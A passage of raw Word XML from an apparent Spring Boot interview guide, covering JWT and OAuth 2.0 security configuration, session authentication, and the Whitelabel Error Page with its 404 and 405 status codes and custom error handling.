          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C311269"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filterChain.doFilter(request, response);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319C4227"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52A29D52"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37A33BF"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ecurity Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422001E0"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ation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F4BFE5"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ableWebSecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2872A602"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SecurityConfig extends WebSecurityConfigurerAdapter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51577131" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="229E562B"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JwtTokenUtil jwtTokenUtil;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5C82A5"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JwtRequestFilter jwtRequestFilter;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0CB150" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00FAF47A"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owired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36819874"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SecurityConfig(JwtTokenUtil jwtTokenUtil, JwtRequestFilter jwtRequestFilter) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C27375"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his.jwtTokenUtil = jwtTokenUtil;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D42239"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this.jwtRequestFilter = jwtRequestFilter;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F31D2EE"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2575AF5B" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ED5070F"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verride</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7C8B7D"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otected void configure(HttpSecurity http) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E00075C"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http.csrf().disable()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1227432B"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horizeRequests()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07488E15"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tMatchers("/api/authenticate").permitAll()  // Allow authentication endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057F7DB8"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yRequest().authenticated()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0706B744"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d()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B160C1"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ddFilterBefore(jwtRequestFilter, UsernamePasswordAuthenticationFilter.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD996AA"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6875EDB1" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F2C9BC3"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verride</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D603000"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otected void configure(AuthenticationManagerBuilder auth) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1E57A1"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h.userDetailsService(userDetailsServiceBean()).passwordEncoder(passwordEncoder());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1476FB"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75255D90" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35834A1C"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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BEE420"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PasswordEncoder passwordEncoder() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E424BD6"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BCryptPasswordEncoder();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70640AA9"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48F9DEE5"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34E8C771"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now authenticate by sending a POST request to /api/authenticate with a username and password, and the server will return a JWT token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61380221"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For subsequent requests, include the JWT token in the Authorization header as Bearer &lt;token&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB6A227" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B"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OAuth 2.0 Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457776CD"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OAuth 2.0 allows third-party applications to authenticate users and authorize actions without directly managing credentials. Spring Security provides support for OAuth 2.0 login and API authorization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13157F00" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B"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teps to Implement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB5E563"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Add </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Security OAuth2</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2DDE41"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e your OAuth provider (Google, Facebook, etc.) in application.properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB454E8"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e @EnableOAuth2Sso for OAuth2 login or @EnableResourceServer for securing REST APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2A1456"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Example for Google OAuth2 authentication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5AE8BA"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application.properties</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499F1E55"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security.oauth2.client.registration.google.client-id=YOUR_GOOGLE_CLIENT_ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785B78E5"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security.oauth2.client.registration.google.client-secret=YOUR_GOOGLE_CLIENT_SECRET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6839D71C"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security.oauth2.client.registration.google.scope=email,profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFE38FF"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ecurity Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDD50B9"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ation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016EAAFE"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ableWebSecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA28767"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SecurityConfig extends WebSecurityConfigurerAdapter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F312594" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B7B75B9"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verride</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5FF8F6"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otected void configure(HttpSecurity http) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDEC0C8"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http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72969ED1"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horizeRequests()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1757BE93"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tMatchers("/login**", "/webjars/**", "/error**").permitAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C36D09E"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yRequest().authenticated()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEDEE40"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d()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD9F793"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auth2Login();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FB92A6"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4535D8C0"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3DC90D8D"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configuration enables OAuth2 login with Google and restricts all other endpoints to authenticated users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65199EDB" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B"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4. Session Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F02016"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Spring Security also supports session-based authentication using </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTP session</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This is the default behavior in Spring Boot when using form-based login or basic authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710BAE60"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server creates a session for an authenticated user and stores it on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682D9687"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session is identified by a cookie, typically JSESSIONID, which is sent with each subsequent request to maintain authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F4AA69" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B"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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403A512A"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re are multiple ways to authenticate APIs in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18489BFD"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Basic Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For simple applications or internal use (use with HTTPS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349509AF"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JWT Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A stateless token-based approach that allows for scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A15112"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OAuth 2.0 Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For integrating with third-party authentication providers like Google, Facebook, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAFF8DA"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ession Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Default method using HTTP session management for maintaining state across requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EAB0D1" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B"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choose the authentication method based on your project’s needs, considering factors like security, user experience, and scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3314C4D3" w14:textId="6558BA54" w:rsidR="00132306" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0013230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EBD0AEB">
          <v:rect id="_x0000_i2740" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A36629F" w14:textId="089F72D0" w:rsidR="009653FD" w:rsidRPr="00CE4B95" w:rsidRDefault="009572AF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="663" w:name="_Toc196308143"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>In the Spring REST API what is the White label error accessing from the browser? What is the status code you will get</w:t>
      </w:r>
      <w:r w:rsidR="009653FD" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="663"/>
    </w:p>
    <w:p w14:paraId="4425F204" w14:textId="31CB6DC7" w:rsidR="00FD7431" w:rsidRPr="002C6305" w:rsidRDefault="00FD7431"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"Whitelabel Error Page"</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Spring Boot is a default error page shown by the Spring Boot application when there is an error (such as an exception or an issue) in the application, and no custom error page or handling mechanism is provided.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC24FA7" w14:textId="77777777" w:rsidR="00FD7431" w:rsidRPr="002C6305" w:rsidRDefault="00FD7431"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Common Causes of the White Label Error Page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F76AF74"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No Mapping Found</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This usually happens when there is no handler method mapped to the URL you're trying to access (e.g., you try to access an endpoint that doesn't exist).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0735E3AA"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Missing Controller or Method</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If a controller or method is missing for the requested URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396BA13D"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Method Not Allowed</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The HTTP method (GET, POST, etc.) you're trying to use for a particular endpoint might not be allowed (e.g., trying to access a POST endpoint via a GET request).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711568A4"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Internal Server Errors</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Issues in the backend logic can also result in this error page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5C405B" w14:textId="77777777" w:rsidR="00FD7431" w:rsidRPr="002C6305" w:rsidRDefault="00FD7431"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Example Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371DC8BD"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try to access a REST endpoint that doesn't exist or you use an incorrect HTTP method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAAC0CC"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Spring Boot application doesn't have a custom error page configured, so it defaults to the white-label error page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB30630" w14:textId="77777777" w:rsidR="00FD7431" w:rsidRPr="002C6305" w:rsidRDefault="00FD7431"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tatus Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28011C22"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When this happens, the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTP status code</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> you will typically see is </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>404 (Not Found)</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405 (Method Not Allowed)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, depending on the issue:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA0FCC6"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lastRenderedPageBreak/>
        <w:t>404 (Not Found)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is the most common status code when there is no mapping for the URL or when the resource is not found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340E0927"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1981F31D" w14:textId="77777777" w:rsidR="00FD7431" w:rsidRPr="002C6305" w:rsidRDefault="00FD7431"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f you try to access /api/nonexistent and there is no controller or handler for it, you will get a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>404</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> status code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29586020"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405 (Method Not Allowed)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This occurs if you are trying to use an unsupported HTTP method (like GET for a POST-only endpoint).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6C7521"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61D65418" w14:textId="77777777" w:rsidR="00FD7431" w:rsidRPr="002C6305" w:rsidRDefault="00FD7431"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rying to use a GET method on an endpoint that only supports POST.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76650624" w14:textId="77777777" w:rsidR="00FD7431" w:rsidRPr="002C6305" w:rsidRDefault="00FD7431"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How to Handle the White Label Error Page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA982B9"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reate Custom Error Page</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can customize error pages in Spring Boot to provide more user-friendly responses instead of the white-label error page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E08BF8F" w14:textId="77777777" w:rsidR="00FD7431" w:rsidRPr="002C6305" w:rsidRDefault="00FD7431"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reate an error.html or error.json page in src/main/resources/templates (for HTML) or src/main/resources/static (for custom JSON error responses).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A9AE50"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 for a custom error page in error.html:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2890F2FA"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html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC63856"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body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6C1B13"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h1&gt;Error Occurred: ${errorMessage}&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74578DF4"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p&gt;Status Code: ${status}&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEDB29D"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body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EA1D50"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html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A73253B"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reate a Global Exception Handler</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Using @ControllerAdvice to handle exceptions globally can avoid showing the white-label error page and provide a more informative response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6837DA"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5F339ADB"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trollerAdvice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C8BCA4"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GlobalExceptionHandler {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F9CDCD" w14:textId="77777777" w:rsidR="00FD7431" w:rsidRPr="002C6305" w:rsidRDefault="00FD7431" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E58EC5D"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xceptionHandler(Exception.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3470A326"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ResponseEntity&lt;String&gt; handleException(Exception ex) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602FA9EA"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ResponseEntity&lt;&gt;("Custom Error Message: " + ex.getMessage(), HttpStatus.INTERNAL_SERVER_ERROR);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F96704B"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695EB181"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70CC8DE8" w14:textId="77777777" w:rsidR="00FD7431" w:rsidRPr="002C6305" w:rsidRDefault="00FD7431"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By customizing error handling, you can give users more meaningful error messages rather than the generic white-label page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A989BC0" w14:textId="4A53C390" w:rsidR="00132306" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0013230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04D8E2A">
          <v:rect id="_x0000_i2741" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E060AA8" w14:textId="3C4E70EC" w:rsidR="00091319" w:rsidRPr="00CE4B95" w:rsidRDefault="00091319" w:rsidP="00091319">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="664" w:name="_Toc196308144"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between @Entity, @Table, and @Id in JPA?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="664"/>
    </w:p>
